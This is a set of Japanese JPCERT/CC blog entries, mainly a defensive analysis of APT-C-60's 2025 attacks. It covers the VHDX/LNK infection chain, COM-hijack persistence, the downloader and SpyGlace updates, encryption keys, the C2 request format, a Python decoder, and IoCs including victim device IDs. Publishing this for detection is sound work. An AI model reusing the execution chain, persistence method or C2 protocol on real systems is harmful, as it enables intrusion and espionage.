href="https://blogs.jpcert.or.jp/ja/.assets/yamagoya-fig3.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/yamagoya-fig3-640wri.png" width="640" height="302" alt="イベントログに記録されたYAMAGoyaのアラート" class="asset asset-image at-xid-3934287 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></a><figcaption>図3：イベントログに記録されたYAMAGoyaのアラート</figcaption></figure> <h3>おわりに</h3> YAMAGoyaは、SigmaやYARAなどの公開されているシグネチャを利用可能なため、セキュリティコミュニティーのノウハウをセキュリティ対策に活用できるツールです。スレットハンティングやインシデントレスポンスなどの際にご活用ください。本ツールに関してPull Requestや要望などお待ちしています。 <h4>FAQ（よくある質問）</h4> <h5>Q1. YAMAGoyaは従来型ウイルス対策ソフトの代わりになりますか？</h5> A. いいえ。YAMAGoyaはウイルス対策ソフトを置き換えるものではなく、補完するツールです。デフォルトで検知ルールはないため、利用する際は検知ルールの収集・作成から行う必要があります。 <h5>Q2. 常駐（バックグラウンド実行）はできますか？</h5> A. はい。システムトレイに常駐し、バックグラウンドで監視できます。設定したルールに基づき、検知があれば通知／ログ出力します。 <h5>Q3. 既存のSIEMと連携できますか？</h5> A. はい。YAMAGoyaはログをテキストとイベントログ（Application）に出力します。これらをログ収集エージェントや転送機能で送れば、SplunkなどのSIEMに取り込めます。 <h5>Q4. ETWバイパス（回避手法）への対策に制限はありますか？</h5> A. はい。現時点でETWバイパスへの専用対策は未実装です。高度な攻撃者がETWを無効化・改ざんして検知を回避する可能性があります。EDRや他の監視ツールと併用して多層防御を構成することを推奨します。
攻撃グループAPT-C-60による攻撃のアップデート

Mon, 27 Oct 2025 01:30:00 -0000

以前のJPCERT/CC Eyesで、正規サービスを悪用した攻撃グループAPT-...

以前のJPCERT/CC Eyesで、<a href="https://blogs.jpcert.or.jp/ja/2024/11/APT-C-60.html" target="_blank">正規サービスを悪用した攻撃グループAPT-C-60による攻撃</a>について紹介しましたが、JPCERT/CCでは引き続き同様の攻撃活動を国内で確認しています。今回は、2025年6月から8月にかけて確認した攻撃について、前回からのアップデートを中心に以下の項目について解説します。 <ul> <li>攻撃の流れ</li> <li>ダウンローダーおよびSpyGlaceのアップデート</li> <li>SpyGlaceのエンコード関数、通信方式</li> <li>使用されたデコイ文章</li> <li>GitHubリポジトリの分析</li> </ul> <h3>攻撃の流れ</h3> JPCERT/CCが確認した攻撃は、2024年8月ごろに発生した攻撃と同様に、求職者を装い組織の採用担当に宛てた標的型攻撃メールでした。攻撃の流れを図1に示します。昨年の攻撃ではGoogle DriveからVHDXファイルをダウンロードさせる方式が使用されていましたが、今回の攻撃では悪性のVHDXファイルが直接添付ファイルとして送られていました。メールの受信者がVHDXファイル内に含まれているLNKファイルをクリックすることで、正規ファイルであるGit経由で悪性のスクリプトが動作します。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update01-800wri.png" width="800" height="449" alt="" class="asset asset-image at-xid-3922463 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図1：マルウェア感染の流れ </div> LNKファイルによって次に示すgcmd.exe（Gitの正規ファイル）が実行され、VHDXファイル内に格納されているスクリプトのglog.txtが動作します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> P:\LICENSES.LOG\mingw64\bin\gcmd.exe "cd .\LICENSES.LOG\mingw64\bin && type glog.txt | gcmd.exe" && exit </pre> Gitによって実行されるスクリプトはデコイ文書の表示、ファイルの作成、実行を担い、作成されたWebClassUser.dat（以降Downloader1と表示）は次に示すレジストリへ登録され、COMハイジャッキングによって永続化および実行されます。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> HKCU\Software\Classes\CLSID\{566296fe-e0e8-475f-ba9c-a31ad31620b1}\InProcServer32 </pre> <h3>DownLoader1およびDownLoader2のアップデート</h3> 攻撃者による被害端末の把握を目的として、Downloader1はstatcounterという正規の統計サービスに対して一定間隔で通信を行います。そのリクエストヘッダーは次のフォーマットで作成されます。以前のバージョンと比較し、ボリュームシリアル番号とコンピュータ名を使用して被害端末を識別している点が異なります。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> Referer: ONLINE=>[Number1],[Number2] >> [%userprofile%] / [VolumeSerialNumber + ComputerName] </pre> また、Downloader1はボリュームシリアル番号とコンピュータ名によるファイル名と検体内に含まれているURLを組み合わせ、次のフォーマットのパスを作成し、通信を行います。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> https://raw.githubusercontent.com/carolab989/class2025/refs/heads/main/[VolumeSerialNumber + ComputerName].txt </pre> 攻撃者がstatcounterへ通信されたリファラの値を確認し、その被害端末に対応した"[VolumeSerialNumber + ComputerName].txt"をGitHubへアップロードするとDownLoader1がそのファイルを取得します。その取得したファイルに記載されているURLを元に次のDownloader2のダウンロードおよび実行が行われます。さらに、"[VolumeSerialNumber + ComputerName].txt"にはダウンロード先URLを指定するだけでなく、表1のコマンドを実行することが可能です。例えば、"1*"の場合、statcounter.comへGETリクエストを送る間隔をデフォルトの1時間から6時間へ変更することが可能になり、攻撃者による被害者環境のチェックをより慎重に行う意図がうかがえます。 <div style="text-align: center;"> 表1 ダウンローダーのコマンド </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>"1*"</td> <td>Change the interval settings</td> </tr> <tr> <td>"0" or "40"</td> <td>Reset the interval settings</td> </tr> <tr> <td>"http*"</td> <td>Download DLL</td> </tr> </tbody> </table> なお、以前のバージョンと同様に取得したファイルは"sgznqhtgnghvmzxponum"を鍵としたXORデコード後に実行されます。 DownLoader2はSpyGlaceおよびそのローダーをダウンロードし、実行する機能を持っています。APIの動的解決手法にはADDとXORをベースとしたエンコード方式が使用されていますが、以前のバージョンから値が変更されており、add 0x04した後、XOR 0x05する方式となっています。なお、SpyGlaceのLoaderについても同様のエンコード方式となっています。以前のバージョンと同様にDownLoader2が取得したファイルは"AadDDRTaSPtyAG57er#$ad!lDKTOPLTEL78pE"を鍵としたXORデコード後にCOMハイジャッキングによって実行されます。 <h3>SpyGlaceのアップデート</h3> JPCERT/CCではVersion 3.1.12、3.1.13、3.1.14の3つのバージョンのSpyGlaceを確認しています。2024年に確認したVersion 3.1.6と比較すると、コマンドprockillとproclistは何もしないよう変更されており、また、新しいコマンドuldが追加されています。コマンドuldはロードしたモジュールの特定の関数を呼び出した後、2秒後にアンロードする機能となっています。モジュールをアンロードする際、特定の関数を実行する必要があるモジュールの場合に本コマンドの機能が必要と考えられます。また、screenuploadコマンドでは、スクリーンショット関連モジュールと思われるファイルパスおよびExport関数名が次のパスへと変更されていることを確認しています。本モジュールClouds.db自体は未確認のためどのような機能かはわかりませんが、スクリーンショットコマンド関連のモジュールと考えられます。なお、実装されているコマンドの一覧はAppendix Dを参照ください。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> File path: %LocalAppData%\Microsoft\Windows\Clouds\Clouds.db Export Function: mssc1 </pre> 確認したVersion 3.1.12、3.1.13、3.1.14における差分はほとんどありませんが、それぞれMutexの値が異なる点や、これまで%public%\AccountPictures\Default\だった自動実行パスがVerison 3.1.14からは%appdata%\Microsoft\SystemCertificates\My\CPLsと変更されている点を確認しています。 なお、2025年9月にVersion3.1.14を使ったキャンペーンについて解説した記事<a href="#1">[1]</a>が公開されていますが、使用されたGitHubリポジトリなどは重複していないため、国外などで確認された別の攻撃キャンペーンと考えられます。 <h3>SpyGlaceのエンコード関数と通信方式の詳細</h3> SpyGlaceの特徴であるエンコード方式は1バイトのXORとSUB命令を組み合わせたものが使用されており、マルウェアが使用する文字列や動的なAPIの解決などに多用されています。また、SpyGlaceのコマンドの一つである"Download"コマンドでは暗号化されたファイルがダウンロードされますが、復号には次のKEYとIVを使用したAES128-CBCにて復号され、%temp%\wcts66889.tmpのファイルパスに作成されることを確認しています。ダウンロードコマンドのコードの一部を図2に示します。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> KEY: B0747C82C23359D1342B47A669796989 IV: 21A44712685A8BA42985783B67883999 </pre> <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update02-800wri.png" width="800" height="598" alt="" class="asset asset-image at-xid-3905241 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図2：ダウンロードコマンドのコードの一部 </div> SpyGlaceはC2サーバーとの通信にBASE64とRC4を使用しますが、その初期通信におけるリクエストヘッダーのフォーマットを次に示します。なお、a001の値に使用されるuseridである"GOLDBAR"という文字列はPositive Technologiesによる報告<a href="#2">[2]</a>や昨年の日本における攻撃の際に使用された文字列と同一であり、ターゲット地域やキャンペーンを指している可能性があります。また、エンコード方式について、少なくともVersion 3.1.6以降のSpyGlaceでは改変されたRC4が使用されています。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> a001=[md5("GOLDBAR")]&a002=[md5(systeminfo)]&a003=["uid" or "info"]&a004=[BASE64(CustomRC4([ComputerName;UserName;CpuInfo;OS Version;SpyGlace Version]))] </pre> 改変されたRC4はKSAのサイクルを増やす点やXORする値に加算を行うなどの点が通常のRC4とは異なり、次に示すPythonスクリプトでデコードすることが可能です。 <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> import base64 def CustomRC4(key: bytes, data: bytes) -> bytes: # --- KSA --- S = list(range(256)) n = 3 for round in range(n): j = 0 keylen = len(key) if keylen == 0: raise ValueError("key must be non-empty") for i in range(256): j = (j + S[i] + key[i % keylen]) & 0xFF S[i], S[j] = S[j], S[i] # --- PRGA --- i = j = 0 out = [] for b in data: i = (i + 1) & 0xFF j = (j + S[i]) & 0xFF k = S[(S[i] + j) & 0xFF] S[i], S[j] = S[j], S[i] k2 = S[((S[((i >> 3) ^ (0x20 * j)) & 0xFF] + S[((0x20 * i) ^ (j >> 3)) & 0xFF]) ^ 0xAA) & 0xFF] + S[(S[j] + S[i]) & 0xFF] out.append( (b ^ k ^ k2) & 0xFF ) return bytes(out) def decode(base64in): key = b"90b149c69b149c4b99c04d1dc9b940b9" decoded = CustomRC4(key, base64.b64decode(base64in)) print("Result: ", decoded) </pre> <h3>使用されたデコイ文章</h3> 今回の攻撃で使用されたデコイ文章の一部を図3に示します。採用担当者をターゲットとしているため、作成された履歴書には研究者を装った経歴を載せており、経歴に複数の論文が記載されていますが、それら論文の著者にはメール送付者の名前は記載されていません。なお、その履歴書の本人の名前はメールの差出人のGmailのアカウント名とある程度一致しており、攻撃者は本攻撃のためにアカウントを取得した可能性があります。 <img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/aptc60update03-800wri.png" width="800" height="1034" alt="" class="asset asset-image at-xid-3905242 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/> <div style="text-align: center;"> 図3：使用されたデコイ文章の一部 </div> <h3>GitHubリポジトリの分析</h3> 攻撃者はペイロードの配布にGitHubを使用している関係で、リポジトリが削除されない限り、過去に配布されたペイロードをすべて取得することが可能です。表2にアップロードしたSpyGlaceとアップロードされていた期間の対応関係を示します。 <div style="text-align: center;"> 表2 各バージョンにおけるGitHubにアップロードされた日時 </div> <table> <thead> <tr> <th>SpyGlace Version</th> <th>Upload Date & Time</th> </tr> </thead> <tbody> <tr> <td>Version 3.1.12</td> <td>Fri Jun 27 14:33:28 2025 +0900</td> </tr> <tr> <td>Version 3.1.13</td> <td>Thu Jul 3 18:25:18 2025 +0900</td> </tr> <tr> <td>Version 3.1.14</td> <td>Wed Jul 16 15:03:52 2025 +0900</td> </tr> </tbody> </table> <table> なお、攻撃者が管理しているGitHubリポジトリへのコミットログに記載されたメールアドレスおよびボリュームシリアル番号とコンピュータ名からなる被害端末情報を確認しています。それらの情報を参考としてAppendix E、Fにそれぞれ記載します。 <h2>おわりに</h2> APT-C-60による攻撃はこれまでの傾向と同様に日本などの東アジア地域を中心に攻撃が行われています。攻撃の内容はBitbucketからGitHubへとインフラを移行した点やマルウェアのアップデートなど変更点は確認できるものの、正規のサービスを使った点やマルウェアの挙動など変わらない部分も多いため、これまでの傾向を踏まえ引き続き注意が必要です。確認したマルウェアの通信先やハッシュ値については、Appendixに記載していますのでそれぞれご確認ください。なお、通信先については正規のサービスも含まれるため、ご注意ください。 インシデントレスポンスグループ増渕維摩 <h4>参考情報</h4> <a name="1"></a>[1] Sangfor 【高级威胁追踪(APT)】深入分析“伪猎者”组织Github仓库加密载荷 <a href="https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A" target="_blank"> https://mp.weixin.qq.com/s/A1UhFfqnGRLsEZywvaQA4A</a> <a name="2"></a>[2] Positive Technologies DarkHotel. A cluster of groups united by common techniques <a href="https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/" target="_blank"> https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques/</a> <h4>Appendix A：IoC Network</h4> <ul> <li>https[:]//c.statcounter[.]com/13139439/0/1ba1a548/1/</li> <li>https[:]//raw.githubusercontent[.]com/carolab989/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/football2025/class2025//refs/heads/main/</li> <li>https[:]//raw.githubusercontent[.]com/fenchiuwu/class2025/refs/heads/main/</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datapages.txt</li> <li>http[:]//raw.githubusercontent[.]com/Ridgley22387/r834829jf/refs/heads/main/datautils.txt</li> <li>https[:]//bitbucket[.]org/clouds999/glo29839/downloads/</li> <li>https[:]//raw.githubusercontent[.]com/goldbars33/ozbdkak33/refs/heads/main/</li> <li>https[:]//185.181.230[.]71/wkdo9/4b3ru.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/t1802.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/n3tb4.asp</li> <li>https[:]//185.181.230[.]71/wkdo9/2qpmk.asp</li> </ul> <h4>Appendix B：IoC File</h4> <div style="text-align: center;"> 表3 ファイル一覧 </div> <table style="table-layout: fixed; width: 100%;"> <colgroup> <col style="width: 20%;"> <col style="width: 20%;"> <col style="width: 60%;"> </colgroup> <thead> <tr> <th>Content</th> <th>Filename</th> <th>Hash(SHA256)</th> </tr> </thead> <tbody> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV & Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">f42d0fa77e5101f0f793e055cb963b45b36536b1835b9ea8864b4283b21bb68f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">25f81709d914a0981716e1afba6b8b5b3163602037d466a02bc1ec97cdc2063b</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic60.ds</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic400.ds</td> <td style="word-wrap: break-word; white-space: normal;">a80848cf7d42e444b7ec1161c479b1d51167893f47d202b05f590ad24bf47942</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">wic900.ds</td> <td style="word-wrap: break-word; white-space: normal;">1e931c8aa00b7f2b3adedc5260a3b69d1ac914fe1c022db072ed45d7b2dddf6c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">glog.txt</td> <td style="word-wrap: break-word; white-space: normal;">c9c6960a5e6f44afda4cc01ff192d84d59c4b31f304d2aeba0ef01ae04ca7df3</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">WebClassUser.dat</td> <td style="word-wrap: break-word; white-space: normal;">f102d490ad02b1588b9b76664cd715c315eaab33ac22b5d0812c092676242b15</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">57a77d8d21ef6a3458763293dbe3130dae2615a5de75cbbdf17bc61785ee79da</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">DownLoader2</td> <td style="word-wrap: break-word; white-space: normal;">WebCacheR.tmp.dat</td> <td style="word-wrap: break-word; white-space: normal;">9e30df1844300032931e569b256f1a8a906a46c6a7efa960d95142d6bea05941</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">git.exe(Legitimate)</td> <td style="word-wrap: break-word; white-space: normal;">gcmd.exe</td> <td style="word-wrap: break-word; white-space: normal;">96312254d33241ce276afc7d7e0c7da648ffe33f3b91b6e4a1810f0086df3dba</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.12</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">669c268e4e1ced22113e5561a7d414a76fcd247189ed87a8f89fbbd61520966a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.13</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">f96557e8d714aa9bac8c3f112294bac28ebc81ea52775c4b8604352bbb8986b8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace version 1.3.14</td> <td style="word-wrap: break-word; white-space: normal;">datautils.txt</td> <td style="word-wrap: break-word; white-space: normal;">8b51939700c65f3cb7ccdc5ef63dba6ca5953ab5d3c255ce3ceb657e7f5bfae8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">d535837fe4e5302f73b781173346fc9031d60019ea65a0e1e92e20e399a2f387</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">SpyGlace Loader</td> <td style="word-wrap: break-word; white-space: normal;">datapages.txt</td> <td style="word-wrap: break-word; white-space: normal;">6d8a935f11665850c45f53dc1a3fc0b4ac9629211bd4281a4ec4343f8fa02004</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader2</td> <td style="word-wrap: break-word; white-space: normal;">coninst3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">d287dc5264fd504b016ec7e424650e2b353946cbf14d3b285ca37d78a6fda6f4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constart3110.dat</td> <td style="word-wrap: break-word; white-space: normal;">10278a46b13797269fd79a5f8f0bc14ff1cc5bc0ea87cdd1bbc8670c464a3cf1</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">ingredient.txt</td> <td style="word-wrap: break-word; white-space: normal;">156df8c8bea005bd7dc49eb7aca230ef85ada1c092e45bb3d69913d78c4fa1f9</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Scrpt</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">7ae86f2cb0bbe344b3102d22ecfcdda889608e103e69ec92932b437674ad5d2f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader Scrpt</td> <td style="word-wrap: break-word; white-space: normal;">UsrClass.sct</td> <td style="word-wrap: break-word; white-space: normal;">e8b3b14a998ce3640a985b4559c90c31a5d7465bc5be5c6962e487172d3c9094</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">intersection.txt</td> <td style="word-wrap: break-word; white-space: normal;">09fcc1dfe973a4dc91582d7a23265c0fd8fc2a011adb2528887c1e1d3a89075a</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">opinsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">048b69386410b8b7ddb7835721de0cba5945ee026a9134d425e0ba0662d9aee4</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Loader</td> <td style="word-wrap: break-word; white-space: normal;">constafile.dat</td> <td style="word-wrap: break-word; white-space: normal;">f495171e7a10fb0b45d28a5260782a8c1f7080bd1173af405476e8d3b11b21b6</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader</td> <td style="word-wrap: break-word; white-space: normal;">coninsfile.dat</td> <td style="word-wrap: break-word; white-space: normal;">8ea32792c1624a928e60334b715d11262ed2975fe921c5de7f4fac89f8bb2de5</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious VHDX</td> <td style="word-wrap: break-word; white-space: normal;">CV & Professional Experience.vhdx</td> <td style="word-wrap: break-word; white-space: normal;">94ccdaf238a42fcc3af9ed1cae1358c05c04a8fa77011331d75825c8ac16ffd8</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Dropper Script</td> <td style="word-wrap: break-word; white-space: normal;">volumelog.txt</td> <td style="word-wrap: break-word; white-space: normal;">299d792c8d0d38d13af68a2467186b2f47a1834c6f2041666adafc626149edaf</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol60.dot</td> <td style="word-wrap: break-word; white-space: normal;">ea37dfa94a63689c1195566aab3d626794adaab4d040d473d4dfbd36f1e5f237</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol400.dot</td> <td style="word-wrap: break-word; white-space: normal;">94f6406a0f40fb8d84ceafaf831f20482700ee1a92f6bca1f769dff98896245c</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Part of Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">vol900.dot</td> <td style="word-wrap: break-word; white-space: normal;">45c1c79064cef01b85f0a62dac368e870e8ac3023bfbb772ec6d226993dc0f87</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Downloader1</td> <td style="word-wrap: break-word; white-space: normal;">UsrClassCache.dat</td> <td style="word-wrap: break-word; white-space: normal;">50b40556aa7461566661d6a8b9486e5829680951b5df5b7584e0ab58f8a7e92f</td> </tr> <tr> <td style="word-wrap: break-word; white-space: normal;">Malicious LNK</td> <td style="word-wrap: break-word; white-space: normal;">Resume.rtf.lnk</td> <td style="word-wrap: break-word; white-space: normal;">5da82fa87b0073de56f2b20169fa4d6ea610ed9c079def6990f4878d020c9d95</td> </tr> </tbody> </table> <h4>Appendix C：IoC Other</h4> <div style="text-align: center;"> 表4 その他のIoC </div> <table> <thead> <tr> <th>Content</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A90B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79AD7B</td> </tr> <tr> <td>Mutex</td> <td>K31610KIO9834PG79A44A</td> </tr> <tr> <td>CLASSID</td> <td>{566296fe-e0e8-475f-ba9c-a31ad31620b1}</td> </tr> <tr> <td>CLASSID</td> <td>{64B8F404-A4AE-11D1-B7B6-00C04FB926AF}</td> </tr> <tr> <td>File path</td> <td>%userprofile%\AppData\Local\Microsoft\Windows\WebClassUser.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\WebCache\WebCacheR.tmp.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\GameList.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\GameDVR\data\DataCache.dat</td> </tr> <tr> <td>File path</td> <td>%temp%\wcts66889.tmp</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%localappdata%\Microsoft\Windows\UsrClassLib.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Config.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\Local\Microsoft\Windows\UsrClassCache.dat</td> </tr> <tr> <td>File path</td> <td>%userprofile%ppdata\local\Microsoft\Edge\cache\Cache.dat</td> </tr> </tbody> </table> <h4>Appendix D：Commands</h4> <div style="text-align: center;"> 表5 SpyGlaceのコマンド一覧 </div> <table> <thead> <tr> <th>Command</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>turn on</td> <td>Change the interval settings</td> </tr> <tr> <td>turn off</td> <td>Reset the interval settings</td> </tr> <tr> <td>cd</td> <td>Change directory</td> </tr> <tr> <td>ddir</td> <td>List of the files in the directory</td> </tr> <tr> <td>ddel</td> <td>Delete file and directory</td> </tr> <tr> <td>ld</td> <td>Load module</td> </tr> <tr> <td>uld</td> <td>unload module</td> </tr> <tr> <td>attach</td> <td>Start module</td> </tr> <tr> <td>detach</td> <td>Stop module</td> </tr> <tr> <td>procspawn</td> <td>Start process</td> </tr> <tr> <td>prockill</td> <td>None</td> </tr> <tr> <td>proclist</td> <td>None</td> </tr> <tr> <td>diskinfo</td> <td>Get disk information</td> </tr> <tr> <td>download</td> <td>Download encrypted file</td> </tr> <tr> <td>downfree</td> <td>Download file</td> </tr> <tr> <td>cancel</td> <td>Remote shell</td> </tr> <tr> <td>screenupload</td> <td>Upload screenshot</td> </tr> <tr> <td>screenauto</td> <td>Upload screenshot automatically</td> </tr> <tr> <td>upload</td> <td>Upload file</td> </tr> </tbody> </table> <h4>Appendix E：Email address used for the commit</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> kithatart@outlook.com magnolia099@163.com carolab989@proton.me fenchiuwu@proton.me Ridgley223870@proton.me </pre> <h4>Appendix F：Victimized devices identified from the GitHub repository</h4> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> 1014988494f04da28046ba 1020301627MBE4OSU 2096821130DESKTOP-BN9A2SA 2958455713DESKTOP-NKVAKV1 4205732935******（個人名が含まれている可能性があるためマスクしています） 3761538073DESKTOP-PVKDUAM 3537034124JKS 3472318429******（個人名が含まれている可能性があるためマスクしています） 1620260207DESKTOP-6LO36DE 1347261043DESKTOP-0V7K7HA 2352730816DESKTOP-4QC5J5Q 3362573326DESKTOP-43R2GH0 </pre>
解説：脆弱性関連情報取扱制度の運用と今後の課題について（後編）～脆弱性悪用情報のハンドリングと今後の課題～

Fri, 19 Sep 2025 02:30:00 -0000

はじめに本稿の前編では、「情報セキュリティ早期警戒パートナーシップ」[1]制度...

<h4>はじめに</h4> 本稿の前編では、「情報セキュリティ早期警戒パートナーシップ」<a href="#fn1">[1]</a>制度に基づく、いわゆる「協調された脆弱性開示（CVD）」について解説し、平時における取り組みをご紹介しました。後編では、脆弱性がすでに悪用されている、あるいは悪用の蓋然性が高まっている状況における対処オペレーションについてご紹介したいと思います。脆弱性悪用の情報、特に公表前のゼロデイ攻撃に関する情報は、多くの組織がその取り扱い経験のあるものではありません。JPCERT/CCでは年間を通じて多くの脆弱性調整・公表を行うほか、悪用情報に関するハンドリング（脆弱性調整と並行した脅威情報の流通、注意喚起、情報共有活動への展開、海外組織との連携等）を行っています。このあまり知られていないオペレーションの解説を踏まえた上で、今後の制度改善のための論点についても簡単に考察してみたいと思います。 ＜本稿をお読みいただく際の注意点＞ ・本稿で解説する際の「脆弱性が見つかった製品」は特段の指定がない限り、基本的に法人向け製品を想定し、解説しています。コンシューマー向け製品における同様の解説については紙幅の都合から省略していますので、ご了承ください。 ・脆弱性悪用情報の取り扱い全般の留意点等については、「サイバー攻撃被害に係る情報の共有・公表ガイダンス」「攻撃技術情報の取扱い・活用手引き」をそれぞれご覧ください。 ・本稿では国内制度外のケースも扱うため、脆弱性告示上の「製品開発者」ではなく一般的に用いられるメーカー／ベンダーという呼称を使います。 <h4> </h4> <h4>脆弱性悪用情報ハンドリング時の判断要素</h4> <hr> 未知の脆弱性を悪用する攻撃キャンペーンが発覚した場合、悪用情報のハンドリング（調整、情報共有、公表等）における各判断要素は以下の図のとおりです。 情報量／正確さ： 被害現場においてただちに「未知の脆弱性が悪用された」と確定できるケースはほとんどなく、被害現場側の調査とメーカー側での検証（期間）を経て確定されます。 脆弱性調整・公表前にメーカーが得ることができた被害現場からの情報が限られていた場合、脆弱性公表や注意喚起後に発覚した被害現場の調査結果から、脆弱性に関する新たな情報が見つかり、場合によっては別の脆弱性の追加公表や追加修正が発生することがあります。 被害現場側調査／メーカー側検証： 悪用された脆弱性の正確な特定のためには、被害現場側での調査だけではなく、メーカー側での検証が必要になります。この点については後述します。 対策の準備／顧客への連絡： メーカー側では脆弱性の特定、検証、対策方法の準備、顧客への連絡、公表等の準備を進めることになります。 攻撃が現在進行形で進んでおり、また甚大な被害が拡大している場合、状況次第では修正プログラムの提供を待たずに情報を開示（公表や顧客への連絡）し、暫定的な回避策や侵害された際の被害低減策、Hotfixの提供を行う場合があります。 公表／注意喚起／情報共有： 一般的な注意喚起発行の判断要素等の解説については、以前公開した以下の記事をご参照ください。 JPCERT/CC 